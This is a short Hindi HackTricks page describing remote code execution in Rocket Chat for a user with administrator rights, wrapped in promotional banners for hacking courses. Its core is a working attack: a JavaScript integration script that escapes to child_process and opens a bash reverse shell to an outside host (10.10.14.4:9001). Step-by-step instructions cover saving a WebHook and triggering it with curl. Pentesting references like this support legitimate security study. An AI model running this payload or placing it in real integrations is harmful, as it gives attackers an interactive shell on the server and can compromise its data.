Rocket Chat
Tip
AWS हैकिंग सीखें और अभ्यास करें:
HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें:HackTricks Training GCP Red Team Expert (GRTE)
Azure हैकिंग सीखें और अभ्यास करें:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाओं की जांच करें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।
RCE
यदि आप Rocket Chat के अंदर व्यवस्थापक हैं, तो आप RCE प्राप्त कर सकते हैं।
Integrationsपर जाएं औरNew Integrationचुनें और कोई भी चुनें:Incoming WebHookयाOutgoing WebHook।/admin/integrations/incoming
.png)
- docs के अनुसार, दोनों ES2015 / ECMAScript 6 (बुनियादी रूप से JavaScript) का उपयोग डेटा को संसाधित करने के लिए करते हैं। तो चलिए एक rev shell for javascript प्राप्त करते हैं जैसे:
const require = console.log.constructor("return process.mainModule.require")()
const { exec } = require("child_process")
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- WebHook को कॉन्फ़िगर करें (चैनल और पोस्ट के रूप में उपयोगकर्ता नाम होना चाहिए):
.png)
- WebHook स्क्रिप्ट को कॉन्फ़िगर करें:
.png)
- परिवर्तनों को सहेजें
- उत्पन्न WebHook URL प्राप्त करें:
.png)
- इसे curl के साथ कॉल करें और आपको rev shell प्राप्त होना चाहिए
Tip
AWS हैकिंग सीखें और अभ्यास करें:
HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें:HackTricks Training GCP Red Team Expert (GRTE)
Azure हैकिंग सीखें और अभ्यास करें:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाओं की जांच करें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।
HackTricks

